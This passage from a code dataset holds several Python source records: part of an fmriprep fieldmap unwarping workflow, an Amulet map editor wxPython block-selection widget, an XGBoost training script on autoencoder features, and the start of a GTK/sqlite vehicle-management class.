float=True),\n name='fmap_fov2ref_apply')\n\n apply_fov_mask = pe.Node(fsl.ApplyMask(), name=\"apply_fov_mask\")\n\n ref_msk_post = pe.Node(ComputeEPIMask(generate_report=True, dilation=1),\n name='ref_msk_post')\n\n workflow.connect([\n (inputnode, meta, [('name_source', 'in_file')]),\n (inputnode, explicit_mask_epi, [('in_reference', 'in_file'),\n ('in_mask', 'mask_file')]),\n (inputnode, fmap2ref_reg, [('fmap_ref', 'moving_image')]),\n (inputnode, fmap2ref_apply, [('in_reference', 'reference_image')]),\n (fmap2ref_reg, fmap2ref_apply, [\n ('composite_transform', 'transforms')]),\n (inputnode, fmap_mask2ref_apply, [('in_reference', 'reference_image')]),\n (fmap2ref_reg, fmap_mask2ref_apply, [\n ('composite_transform', 'transforms')]),\n (inputnode, ds_reg_vsm, [('name_source', 'source_file')]),\n (fmap2ref_apply, ds_reg_vsm, [('out_report', 'in_file')]),\n (explicit_mask_epi, fmap2ref_reg, [('out_file', 'fixed_image')]),\n (inputnode, ds_reg, [('name_source', 'source_file')]),\n (fmap2ref_reg, ds_reg, [('out_report', 'in_file')]),\n (inputnode, fmap2ref_apply, [('fmap', 'input_image')]),\n (inputnode, fmap_mask2ref_apply, [('fmap_mask', 'input_image')]),\n (fmap2ref_apply, torads, [('output_image', 'in_file')]),\n (meta, gen_vsm, [(('out_dict', _get_ec), 'dwell_time'),\n (('out_dict', _get_pedir_fugue), 'unwarp_direction')]),\n (meta, vsm2dfm, [(('out_dict', _get_pedir_bids), 'pe_dir')]),\n (torads, gen_vsm, [('out', 'fmap_in_file')]),\n (vsm2dfm, unwarp_reference, [('out_file', 'transforms')]),\n (inputnode, unwarp_reference, [('in_reference', 'reference_image')]),\n (inputnode, unwarp_reference, [('in_reference', 'input_image')]),\n (vsm2dfm, outputnode, [('out_file', 'out_warp')]),\n (vsm2dfm, jac_dfm, [('out_file', 'deformationField')]),\n (inputnode, fieldmap_fov_mask, [('fmap_ref', 'in_file')]),\n (fieldmap_fov_mask, fmap_fov2ref_apply, [('out', 'input_image')]),\n (inputnode, fmap_fov2ref_apply, [('in_reference', 'reference_image')]),\n (fmap2ref_reg, fmap_fov2ref_apply, [('composite_transform', 'transforms')]),\n (fmap_fov2ref_apply, apply_fov_mask, [('output_image', 'mask_file')]),\n (unwarp_reference, apply_fov_mask, [('output_image', 'in_file')]),\n (apply_fov_mask, ref_msk_post, [('out_file', 'in_file')]),\n (apply_fov_mask, outputnode, [('out_file', 'out_reference')]),\n (ref_msk_post, outputnode, [('mask_file', 'out_mask')]),\n (ref_msk_post, outputnode, [('out_report', 'out_mask_report')]),\n (jac_dfm, outputnode, [('jacobian_image', 'out_jacobian')]),\n ])\n\n if not settings.get('fmap_bspline', False):\n workflow.connect([\n (fmap_mask2ref_apply, gen_vsm, [('output_image', 'mask_file')])\n ])\n\n if settings.get('fmap-demean', True):\n # Demean within mask\n demean = pe.Node(niu.Function(function=_demean), name='demean')\n\n workflow.connect([\n (gen_vsm, demean, [('shift_out_file', 'in_file')]),\n (fmap_mask2ref_apply, demean, [('output_image', 'in_mask')]),\n (demean, vsm2dfm, [('out', 'in_file')]),\n ])\n\n else:\n workflow.connect([\n (gen_vsm, vsm2dfm, [('shift_out_file', 'in_file')]),\n ])\n\n return workflow\n\n# Helper functions\n# ------------------------------------------------------------\n\n\ndef _get_ec(in_dict):\n return float(in_dict['EffectiveEchoSpacing'])\n\n\ndef _get_pedir_bids(in_dict):\n return in_dict['PhaseEncodingDirection']\n\n\ndef _get_pedir_fugue(in_dict):\n return in_dict['PhaseEncodingDirection'].replace('i', 'x').replace('j', 'y').replace('k', 'z')\n\n\ndef _hz2rads(in_file, out_file=None):\n \"\"\"Transform a fieldmap in Hz into 
rad/s\"\"\"\n from math import pi\n import nibabel as nb\n from fmriprep.utils.misc import genfname\n if out_file is None:\n out_file = genfname(in_file, 'rads')\n nii = nb.load(in_file)\n data = nii.get_data() * 2.0 * pi\n nb.Nifti1Image(data, nii.get_affine(),\n nii.get_header()).to_filename(out_file)\n return out_file\n\n\ndef _demean(in_file, in_mask, out_file=None):\n import numpy as np\n import nibabel as nb\n from fmriprep.utils.misc import genfname\n\n if out_file is None:\n out_file = genfname(in_file, 'demeaned')\n nii = nb.load(in_file)\n msk = nb.load(in_mask).get_data()\n data = nii.get_data()\n data -= np.median(data[msk > 0])\n nb.Nifti1Image(data, nii.affine, nii.header).to_filename(\n out_file)\n return out_file\n\n\ndef _fill_with_ones(in_file):\n import nibabel as nb\n import numpy as np\n import os\n\n nii = nb.load(in_file)\n data = np.ones(nii.shape)\n\n out_name = os.path.abspath(\"out.nii.gz\")\n nb.Nifti1Image(data, nii.affine, nii.header).to_filename(out_name)\n\n return out_name\n", "sub_path": "fmriprep/workflows/fieldmap/unwarp.py", "file_name": "unwarp.py", "file_ext": "py", "file_size_in_byte": 10789, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "nipype.pipeline.engine.Workflow", "line_number": 86, "usage_type": "call"}, {"api_name": "nipype.pipeline.engine", "line_number": 86, "usage_type": "name"}, {"api_name": "nipype.pipeline.engine.Node", "line_number": 87, "usage_type": "call"}, {"api_name": "nipype.pipeline.engine", "line_number": 87, "usage_type": "name"}, {"api_name": "nipype.interfaces.utility.IdentityInterface", "line_number": 87, "usage_type": "call"}, {"api_name": "nipype.interfaces.utility", "line_number": 87, "usage_type": "name"}, {"api_name": "nipype.pipeline.engine.Node", "line_number": 90, "usage_type": "call"}, {"api_name": "nipype.pipeline.engine", "line_number": 90, "usage_type": "name"}, {"api_name": "nipype.interfaces.utility.IdentityInterface", "line_number": 90, "usage_type": "call"}, {"api_name": "nipype.interfaces.utility", "line_number": 90, "usage_type": "name"}, {"api_name": "nipype.pipeline.engine.Node", "line_number": 94, "usage_type": "call"}, {"api_name": "nipype.pipeline.engine", "line_number": 94, "usage_type": "name"}, {"api_name": "fmriprep.interfaces.ReadSidecarJSON", "line_number": 94, "usage_type": "call"}, {"api_name": "nipype.pipeline.engine.Node", "line_number": 96, "usage_type": "call"}, {"api_name": "nipype.pipeline.engine", "line_number": 96, "usage_type": "name"}, {"api_name": "nipype.interfaces.fsl.ApplyMask", "line_number": 96, "usage_type": "call"}, {"api_name": "nipype.interfaces.fsl", "line_number": 96, "usage_type": "name"}, {"api_name": "pkg_resources.resource_filename", "line_number": 100, "usage_type": "call"}, {"api_name": "pkg_resources.resource_filename", "line_number": 102, "usage_type": "call"}, {"api_name": "nipype.pipeline.engine.Node", "line_number": 104, "usage_type": "call"}, {"api_name": "nipype.pipeline.engine", "line_number": 104, "usage_type": "name"}, {"api_name": "niworkflows.interfaces.registration.ANTSRegistrationRPT", "line_number": 104, "usage_type": "call"}, {"api_name": "nipype.pipeline.engine.Node", "line_number": 110, "usage_type": "call"}, {"api_name": "nipype.pipeline.engine", "line_number": 110, "usage_type": "name"}, {"api_name": "fmriprep.interfaces.bids.DerivativesDataSink", "line_number": 111, "usage_type": "call"}, {"api_name": "nipype.pipeline.engine.Node", "line_number": 115, "usage_type": 
"call"}, {"api_name": "nipype.pipeline.engine", "line_number": 115, "usage_type": "name"}, {"api_name": "niworkflows.interfaces.registration.ANTSApplyTransformsRPT", "line_number": 115, "usage_type": "call"}, {"api_name": "nipype.pipeline.engine.Node", "line_number": 119, "usage_type": "call"}, {"api_name": "nipype.pipeline.engine", "line_number": 119, "usage_type": "name"}, {"api_name": "niworkflows.interfaces.registration.ANTSApplyTransformsRPT", "line_number": 119, "usage_type": "call"}, {"api_name": "nipype.pipeline.engine.Node", "line_number": 124, "usage_type": "call"}, {"api_name": "nipype.pipeline.engine", "line_number": 124, "usage_type": "name"}, {"api_name": "fmriprep.interfaces.bids.DerivativesDataSink", "line_number": 125, "usage_type": "call"}, {"api_name": "nipype.pipeline.engine.Node", "line_number": 129, "usage_type": "call"}, {"api_name": "nipype.pipeline.engine", "line_number": 129, "usage_type": "name"}, {"api_name": "nipype.interfaces.utility.Function", "line_number": 129, "usage_type": "call"}, {"api_name": "nipype.interfaces.utility", "line_number": 129, "usage_type": "name"}, {"api_name": "nipype.pipeline.engine.Node", "line_number": 131, "usage_type": "call"}, {"api_name": "nipype.pipeline.engine", "line_number": 131, "usage_type": "name"}, {"api_name": "nipype.interfaces.fsl.FUGUE", "line_number": 131, "usage_type": "call"}, {"api_name": "nipype.interfaces.fsl", "line_number": 131, "usage_type": "name"}, {"api_name": "nipype.pipeline.engine.Node", "line_number": 134, "usage_type": "call"}, {"api_name": "nipype.pipeline.engine", "line_number": 134, "usage_type": "name"}, {"api_name": "fmriprep.interfaces.itk.FUGUEvsm2ANTSwarp", "line_number": 134, "usage_type": "call"}, {"api_name": "fmriprep.interfaces.itk", "line_number": 134, "usage_type": "name"}, {"api_name": "nipype.pipeline.engine.Node", "line_number": 135, "usage_type": "call"}, {"api_name": "nipype.pipeline.engine", "line_number": 135, "usage_type": "name"}, {"api_name": "nipype.interfaces.ants.CreateJacobianDeterminantImage", "line_number": 135, "usage_type": "call"}, {"api_name": "nipype.pipeline.engine.Node", "line_number": 138, "usage_type": "call"}, {"api_name": "nipype.pipeline.engine", "line_number": 138, "usage_type": "name"}, {"api_name": "niworkflows.interfaces.registration.ANTSApplyTransformsRPT", "line_number": 138, "usage_type": "call"}, {"api_name": "nipype.pipeline.engine.Node", "line_number": 144, "usage_type": "call"}, {"api_name": "nipype.pipeline.engine", "line_number": 144, "usage_type": "name"}, {"api_name": "nipype.interfaces.utility.Function", "line_number": 144, "usage_type": "call"}, {"api_name": "nipype.interfaces.utility", "line_number": 144, "usage_type": "name"}, {"api_name": "nipype.pipeline.engine.Node", "line_number": 146, "usage_type": "call"}, {"api_name": "nipype.pipeline.engine", "line_number": 146, "usage_type": "name"}, {"api_name": "niworkflows.interfaces.registration.ANTSApplyTransformsRPT", "line_number": 146, "usage_type": "call"}, {"api_name": "nipype.pipeline.engine.Node", "line_number": 151, "usage_type": "call"}, {"api_name": "nipype.pipeline.engine", "line_number": 151, "usage_type": "name"}, {"api_name": "nipype.interfaces.fsl.ApplyMask", "line_number": 151, "usage_type": "call"}, {"api_name": "nipype.interfaces.fsl", "line_number": 151, "usage_type": "name"}, {"api_name": "nipype.pipeline.engine.Node", "line_number": 153, "usage_type": "call"}, {"api_name": "nipype.pipeline.engine", "line_number": 153, "usage_type": "name"}, {"api_name": 
"niworkflows.interfaces.masks.ComputeEPIMask", "line_number": 153, "usage_type": "call"}, {"api_name": "nipype.pipeline.engine.Node", "line_number": 204, "usage_type": "call"}, {"api_name": "nipype.pipeline.engine", "line_number": 204, "usage_type": "name"}, {"api_name": "nipype.interfaces.utility.Function", "line_number": 204, "usage_type": "call"}, {"api_name": "nipype.interfaces.utility", "line_number": 204, "usage_type": "name"}, {"api_name": "fmriprep.utils.misc.genfname", "line_number": 241, "usage_type": "call"}, {"api_name": "nibabel.load", "line_number": 242, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 243, "usage_type": "name"}, {"api_name": "nibabel.Nifti1Image", "line_number": 244, "usage_type": "call"}, {"api_name": "fmriprep.utils.misc.genfname", "line_number": 255, "usage_type": "call"}, {"api_name": "nibabel.load", "line_number": 256, "usage_type": "call"}, {"api_name": "nibabel.load", "line_number": 257, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 259, "usage_type": "call"}, {"api_name": "nibabel.Nifti1Image", "line_number": 260, "usage_type": "call"}, {"api_name": "nibabel.load", "line_number": 270, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 271, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 273, "usage_type": "call"}, {"api_name": "os.path", "line_number": 273, "usage_type": "attribute"}, {"api_name": "nibabel.Nifti1Image", "line_number": 274, "usage_type": "call"}]} {"seq_id": "350756960", "text": "import wx\nfrom wx.lib import newevent\nfrom typing import Tuple, List, Optional\n\nimport PyMCTranslate\n\nfrom amulet_map_editor.api.image import COLOUR_PICKER\n\n(\n NamespaceChangeEvent,\n EVT_NAMESPACE_CHANGE,\n) = newevent.NewCommandEvent() # the namespace entry changed\n(\n BlockNameChangeEvent,\n EVT_BLOCK_NAME_CHANGE,\n) = newevent.NewCommandEvent() # the block name entry changed\n(\n BlockChangeEvent,\n EVT_BLOCK_CHANGE,\n) = (\n newevent.NewCommandEvent()\n) # the block or namespace changed. Generated after EVT_BLOCK_NAME_CHANGE\n(\n PickBlockEvent,\n EVT_PICK_BLOCK,\n) = newevent.NewCommandEvent() # The pick block button was pressed\n\n\nclass BlockSelect(wx.Panel):\n def __init__(\n self,\n parent: wx.Window,\n translation_manager: PyMCTranslate.TranslationManager,\n platform: str,\n version_number: Tuple[int, int, int],\n force_blockstate: bool,\n namespace: str = None,\n block_name: str = None,\n show_pick_block: bool = False,\n ):\n super().__init__(parent, style=wx.BORDER_SIMPLE)\n self._sizer = wx.BoxSizer(wx.VERTICAL)\n self.SetSizer(self._sizer)\n\n self._translation_manager = translation_manager\n\n self._platform: Optional[str] = None\n self._version_number: Optional[Tuple[int, int, int]] = None\n self._force_blockstate: Optional[bool] = None\n\n sizer = wx.BoxSizer(wx.HORIZONTAL)\n self._sizer.Add(sizer, 0, wx.EXPAND | wx.ALL, 5)\n text = wx.StaticText(self, label=\"Namespace:\", style=wx.ALIGN_CENTER)\n sizer.Add(text, 1, wx.ALIGN_CENTER_VERTICAL)\n self._namespace_combo = wx.ComboBox(self)\n sizer.Add(self._namespace_combo, 2)\n self._set_version((platform, version_number, force_blockstate or False))\n self._populate_namespace()\n self.set_namespace(namespace)\n\n self._namespace_combo.Bind(\n wx.EVT_TEXT, lambda evt: self._post_namespace_change()\n )\n self._do_text_event = (\n True # some widgets create events. 
This is used to suppress them\n )\n\n self.Bind(EVT_NAMESPACE_CHANGE, self._on_namespace_change)\n sizer = wx.BoxSizer(wx.VERTICAL)\n self._sizer.Add(sizer, 1, wx.EXPAND | wx.LEFT | wx.RIGHT | wx.BOTTOM, 5)\n header_sizer = wx.BoxSizer(wx.HORIZONTAL)\n sizer.Add(header_sizer, 0, wx.EXPAND | wx.BOTTOM, 5)\n header_sizer.Add(\n wx.StaticText(self, label=\"Block name:\", style=wx.ALIGN_CENTER),\n 1,\n wx.ALIGN_CENTER_VERTICAL,\n )\n search_sizer = wx.BoxSizer(wx.HORIZONTAL)\n header_sizer.Add(search_sizer, 2, wx.EXPAND)\n self._block_search = wx.SearchCtrl(self)\n search_sizer.Add(self._block_search, 1, wx.ALIGN_CENTER_VERTICAL)\n self._block_search.Bind(wx.EVT_TEXT, self._on_search_change)\n if show_pick_block:\n pick_block_button = wx.BitmapButton(\n self, bitmap=COLOUR_PICKER.bitmap(22, 22)\n )\n search_sizer.Add(\n pick_block_button, 0, wx.LEFT | wx.ALIGN_CENTER_VERTICAL, 5\n )\n pick_block_button.Bind(\n wx.EVT_BUTTON,\n lambda evt: wx.PostEvent(\n self, PickBlockEvent(self.GetId(), widget=self)\n ),\n )\n self._block_list_box = wx.ListBox(self, style=wx.LB_SINGLE)\n sizer.Add(self._block_list_box, 1, wx.EXPAND)\n\n self._block_names: List[str] = []\n self._populate_block_name()\n self.set_block_name(block_name)\n self._block_list_box.Bind(wx.EVT_LISTBOX, lambda evt: self._post_block_change())\n\n def _post_namespace_change(self):\n if self._do_text_event:\n wx.PostEvent(\n self, NamespaceChangeEvent(self.GetId(), namespace=self.namespace)\n )\n self._do_text_event = True\n\n def _post_block_change(self):\n wx.PostEvent(\n self, BlockNameChangeEvent(self.GetId(), block_name=self.block_name)\n ),\n wx.PostEvent(\n self,\n BlockChangeEvent(\n self.GetId(), namespace=self.namespace, block_name=self.block_name\n ),\n )\n\n @property\n def version(self) -> Tuple[str, Tuple[int, int, int], bool]:\n return self._platform, self._version_number, self._force_blockstate\n\n @version.setter\n def version(self, version: Tuple[str, Tuple[int, int, int], bool]):\n self._set_version(version)\n self._populate_namespace()\n self.namespace = None\n\n def _set_version(self, version: Tuple[str, Tuple[int, int, int], bool]):\n assert (\n version[0] in self._translation_manager.platforms()\n and version[1] in self._translation_manager.version_numbers(version[0])\n and isinstance(version[2], bool)\n ), f\"{version} is not a valid version\"\n self._platform, self._version_number, self._force_blockstate = version\n\n @property\n def namespace(self) -> str:\n return self._namespace_combo.GetValue()\n\n @namespace.setter\n def namespace(self, namespace: str):\n self.set_namespace(namespace)\n wx.PostEvent(self, NamespaceChangeEvent(self.GetId(), namespace=self.namespace))\n\n def set_namespace(self, namespace: str):\n namespace = namespace or \"minecraft\"\n if isinstance(namespace, str):\n if namespace in self._namespace_combo.GetItems():\n self._namespace_combo.SetSelection(\n self._namespace_combo.GetItems().index(namespace)\n )\n else:\n self._namespace_combo.ChangeValue(namespace)\n\n @property\n def block_name(self) -> str:\n block_name: str = self._block_list_box.GetString(\n self._block_list_box.GetSelection()\n )\n if self._block_list_box.GetSelection() == 0 and block_name.startswith('\"'):\n block_name = block_name[1:-1]\n return block_name\n\n @block_name.setter\n def block_name(self, block_name: str):\n if self.set_block_name(block_name):\n self._post_block_change()\n\n def set_block_name(self, block_name: str) -> bool:\n block_name = block_name or \"\"\n self._block_search.ChangeValue(block_name)\n 
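# Note: ChangeValue() (unlike SetValue()) does not emit wx.EVT_TEXT, so\n        # updating the search box programmatically here does not re-trigger\n        # _on_search_change.\n        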
return self._update_block_name(block_name)\n\n def _populate_namespace(self):\n version = self._translation_manager.get_version(\n self._platform, self._version_number\n )\n namespaces = version.block.namespaces(self._force_blockstate)\n self._do_text_event = False\n self._namespace_combo.Set(namespaces)\n\n def _populate_block_name(self):\n version = self._translation_manager.get_version(\n self._platform, self._version_number\n )\n self._block_names = version.block.base_names(\n self.namespace, self._force_blockstate\n )\n self._block_list_box.SetItems(self._block_names)\n\n def _on_namespace_change(self, evt):\n self._populate_block_name()\n self.block_name = None\n evt.Skip()\n\n def _on_search_change(self, evt):\n search_str = evt.GetString()\n if self._update_block_name(search_str):\n self._post_block_change()\n\n def _update_block_name(self, search_str: str) -> bool:\n block_names = [bn for bn in self._block_names if search_str in bn]\n if search_str not in block_names:\n block_names.insert(0, f'\"{search_str}\"')\n\n index = 0\n selection = self._block_list_box.GetSelection()\n if selection != wx.NOT_FOUND:\n current_string = self._block_list_box.GetString(selection)\n if current_string in block_names:\n index = block_names.index(current_string)\n\n self._block_list_box.SetItems(block_names)\n if index:\n # if the previously selected string is in the list select that\n self._block_list_box.SetSelection(index)\n return False\n elif search_str in block_names:\n # if the searched text perfectly matches select that\n self._block_list_box.SetSelection(block_names.index(search_str))\n return True\n elif len(self._block_list_box.GetItems()) >= 2:\n self._block_list_box.SetSelection(1)\n return True\n else:\n self._block_list_box.SetSelection(0)\n return True\n\n\nif __name__ == \"__main__\":\n\n def main():\n app = wx.App()\n translation_manager = PyMCTranslate.new_translation_manager()\n dialog = wx.Dialog(None)\n sizer = wx.BoxSizer()\n dialog.SetSizer(sizer)\n sizer.Add(BlockSelect(dialog, translation_manager, \"java\", (1, 16, 0), False))\n dialog.Show()\n dialog.Fit()\n app.MainLoop()\n\n main()\n", "sub_path": "amulet_map_editor/api/wx/ui/block_select/block.py", "file_name": "block.py", "file_ext": "py", "file_size_in_byte": 8828, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "wx.lib.newevent.NewCommandEvent", "line_number": 12, "usage_type": "call"}, {"api_name": "wx.lib.newevent", "line_number": 12, "usage_type": "name"}, {"api_name": "wx.lib.newevent.NewCommandEvent", "line_number": 16, "usage_type": "call"}, {"api_name": "wx.lib.newevent", "line_number": 16, "usage_type": "name"}, {"api_name": "wx.lib.newevent.NewCommandEvent", "line_number": 21, "usage_type": "call"}, {"api_name": "wx.lib.newevent", "line_number": 21, "usage_type": "name"}, {"api_name": "wx.lib.newevent.NewCommandEvent", "line_number": 26, "usage_type": "call"}, {"api_name": "wx.lib.newevent", "line_number": 26, "usage_type": "name"}, {"api_name": "wx.Panel", "line_number": 29, "usage_type": "attribute"}, {"api_name": "wx.Window", "line_number": 32, "usage_type": "attribute"}, {"api_name": "PyMCTranslate.TranslationManager", "line_number": 33, "usage_type": "attribute"}, {"api_name": "typing.Tuple", "line_number": 35, "usage_type": "name"}, {"api_name": "wx.BORDER_SIMPLE", "line_number": 41, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 42, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 42, 
"usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 47, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 48, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 48, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 49, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 51, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 51, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 52, "usage_type": "attribute"}, {"api_name": "wx.ALL", "line_number": 52, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 53, "usage_type": "call"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 53, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER_VERTICAL", "line_number": 54, "usage_type": "attribute"}, {"api_name": "wx.ComboBox", "line_number": 55, "usage_type": "call"}, {"api_name": "wx.EVT_TEXT", "line_number": 62, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 69, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 69, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 70, "usage_type": "attribute"}, {"api_name": "wx.LEFT", "line_number": 70, "usage_type": "attribute"}, {"api_name": "wx.RIGHT", "line_number": 70, "usage_type": "attribute"}, {"api_name": "wx.BOTTOM", "line_number": 70, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 71, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 71, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 72, "usage_type": "attribute"}, {"api_name": "wx.BOTTOM", "line_number": 72, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 74, "usage_type": "call"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 74, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER_VERTICAL", "line_number": 76, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 78, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 78, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 79, "usage_type": "attribute"}, {"api_name": "wx.SearchCtrl", "line_number": 80, "usage_type": "call"}, {"api_name": "wx.ALIGN_CENTER_VERTICAL", "line_number": 81, "usage_type": "attribute"}, {"api_name": "wx.EVT_TEXT", "line_number": 82, "usage_type": "attribute"}, {"api_name": "wx.BitmapButton", "line_number": 84, "usage_type": "call"}, {"api_name": "amulet_map_editor.api.image.COLOUR_PICKER.bitmap", "line_number": 85, "usage_type": "call"}, {"api_name": "amulet_map_editor.api.image.COLOUR_PICKER", "line_number": 85, "usage_type": "name"}, {"api_name": "wx.LEFT", "line_number": 88, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER_VERTICAL", "line_number": 88, "usage_type": "attribute"}, {"api_name": "wx.EVT_BUTTON", "line_number": 91, "usage_type": "attribute"}, {"api_name": "wx.PostEvent", "line_number": 92, "usage_type": "call"}, {"api_name": "wx.ListBox", "line_number": 96, "usage_type": "call"}, {"api_name": "wx.LB_SINGLE", "line_number": 96, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 97, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 99, "usage_type": "name"}, {"api_name": "wx.EVT_LISTBOX", "line_number": 102, "usage_type": "attribute"}, {"api_name": "wx.PostEvent", "line_number": 106, "usage_type": "call"}, {"api_name": "wx.PostEvent", "line_number": 112, "usage_type": "call"}, {"api_name": "wx.PostEvent", 
"line_number": 115, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 123, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 127, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 132, "usage_type": "name"}, {"api_name": "wx.PostEvent", "line_number": 147, "usage_type": "call"}, {"api_name": "wx.NOT_FOUND", "line_number": 212, "usage_type": "attribute"}, {"api_name": "wx.App", "line_number": 237, "usage_type": "call"}, {"api_name": "PyMCTranslate.new_translation_manager", "line_number": 238, "usage_type": "call"}, {"api_name": "wx.Dialog", "line_number": 239, "usage_type": "call"}, {"api_name": "wx.BoxSizer", "line_number": 240, "usage_type": "call"}]} {"seq_id": "136178587", "text": "__author__ = '@Tssp'\nimport numpy as np\nimport pandas as pd\nimport os\nimport matplotlib.pyplot as plt\nimport xgboost as xgb\nfrom codvidutils.Autoencoder_Uncertainty_Transformation_main import Transformation_main\nimport pickle\n\nfor it in range(0, 10):\n model = 'hdf_files/Uncertainty_AE_Covid.hdf5'\n outputs = Transformation_main('data/train_split_v4.csv', 'data/test_split_v5.csv', model)\n Y_test = outputs['Y_test']\n Y_train = outputs['Y_train']\n encoder_train = outputs['encoder_train']\n encoder_test = outputs['encoder_test']\n del outputs\n\n #------------XGBoost------------#\n # Regressor:\n lr = 0.005\n n_trees = 250\n depth = 3\n print('#'*10 +' max depth = {} '.format(depth)+ '#'*10)\n xgbr = xgb.XGBRegressor(objective ='reg:logistic', learning_rate = lr, n_estimators = n_trees, max_depth=depth, n_jobs=-1)\n xgbr.fit(encoder_train, Y_train)\n # save model\n pickle.dump(xgbr, open('log/XGBr_uncmodel_{}.pkl'.format(it+1), \"wb\"))\n encoder_test = encoder_test.reshape((encoder_test.shape[0], 23*23*70))\n preds = xgbr.predict(encoder_test)\n nocovid = preds[np.where(Y_test == 0)]\n covid = preds[np.where(Y_test == 1)]\n print(\"\\n\\n---------- Predictions ----------\\n\")\n print(\"preds = \", preds)\n np.savetxt('log/preds_XGBr_Uncertainty_{}.txt'.format(it+1), preds, delimiter=',')\n del encoder_train, encoder_test, xgbr, preds, nocovid, covid, Y_test, Y_train\n", "sub_path": "Uncertainty_XGBoost.py", "file_name": "Uncertainty_XGBoost.py", "file_ext": "py", "file_size_in_byte": 1431, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "codvidutils.Autoencoder_Uncertainty_Transformation_main.Transformation_main", "line_number": 12, "usage_type": "call"}, {"api_name": "xgboost.XGBRegressor", "line_number": 25, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.savetxt", "line_number": 35, "usage_type": "call"}]} {"seq_id": "338540099", "text": "# -*- coding: utf-8 -*-\n'''\nCreated on 12/11/2012\n\n@author: victor\n'''\n\nimport sqlite3\nimport gtk\nimport pygtk\nimport Informacion\nfrom Pedidos import Pedidos\n\ndef lt( cadena ):\n return unicode( cadena, 'utf-8' ).encode( 'iso-8859-1' )\n\nclass Vehiculos( object ):\n\n sql = \"select * from vistaVehiculos where estado = 'Ninguno'\"\n\n def __init__( self, widgets ):\n self.widgets = widgets\n self.ventanaVehiculos = self.widgets.get_object( \"windowVehiculos\" )\n self.listaCombus = self.widgets.get_object( \"listCombustible\" )\n self.listaTipos = self.widgets.get_object( \"listTipo\" )\n\n self.entryMatric = 
self.widgets.get_object( \"entryMat\" )\n self.entryMarca = self.widgets.get_object( \"entryMar\" )\n self.entryModelo = self.widgets.get_object( \"entryMod\" )\n self.entryKM = self.widgets.get_object( \"spinKM\" )\n self.entryYear = self.widgets.get_object( \"spinYear\" )\n self.entryColor = self.widgets.get_object( \"entryCol\" )\n self.comboCombus = self.widgets.get_object( \"comboCombus\" )\n self.comboTipo = self.widgets.get_object( \"comboTipo\" )\n self.precioActual = self.widgets.get_object( \"entryPrecioActual\" )\n self.ajuste = self.widgets.get_object( \"adjustment1\" )\n\n self.listaVehiculos = self.widgets.get_object( \"listVehiculos\" )\n self.listaVehiculos.clear()\n self.tvVehiculos = self.widgets.get_object( \"treeviewVehiculos\" )\n\n self.checkDispo = self.widgets.get_object( \"checkDispo\" )\n self.checkVend = self.widgets.get_object( \"checkVend\" )\n self.checkElim = self.widgets.get_object( \"checkElim\" )\n\n self.imgMatric = self.widgets.get_object( \"imageMatric\" )\n self.bInsertar = self.widgets.get_object( \"buttonAccionVeh\" )\n\n # Marco dos por defecto\n self.checkDispo.set_active( 1 )\n self.checkVend.set_active( 1 )\n self.checkElim.set_active( 0 )\n\n self.listar( None )\n conn = sqlite3.connect( 'datos.db' )\n conn.text_factory = str\n\n with conn:\n self.listaCombus.clear()\n self.listaTipos.clear()\n c = conn.cursor()\n sql = \"select * from combustibles\"\n c.execute( sql )\n for datos in c:\n self.listaCombus.append( [datos[0]] )\n\n sql = \"select * from tipo\"\n c.execute( sql )\n for datos in c:\n self.listaTipos.append( [datos[0]] )\n\n def listar( self, widget ):\n \"Muestra todos los vehiculos\"\n conn = sqlite3.connect( 'datos.db' )\n conn.text_factory = str\n\n with conn:\n c = conn.cursor()\n self.sql = \"select * from vistaVehiculos where estado = 'Ninguno'\"\n\n if ( self.checkDispo.get_active() ):\n self.sql += \" or estado = 'Disponible'\"\n\n if ( self.checkElim.get_active() ):\n self.sql += \" or estado = 'Eliminado'\"\n\n if ( self.checkVend.get_active() ):\n self.sql += \" or estado = 'Vendido'\"\n\n c.execute( self.sql )\n self.listaVehiculos.clear()\n\n for datos in c:\n if ( datos[7] == 'Disponible' ):\n color = '#90D78A'\n elif ( 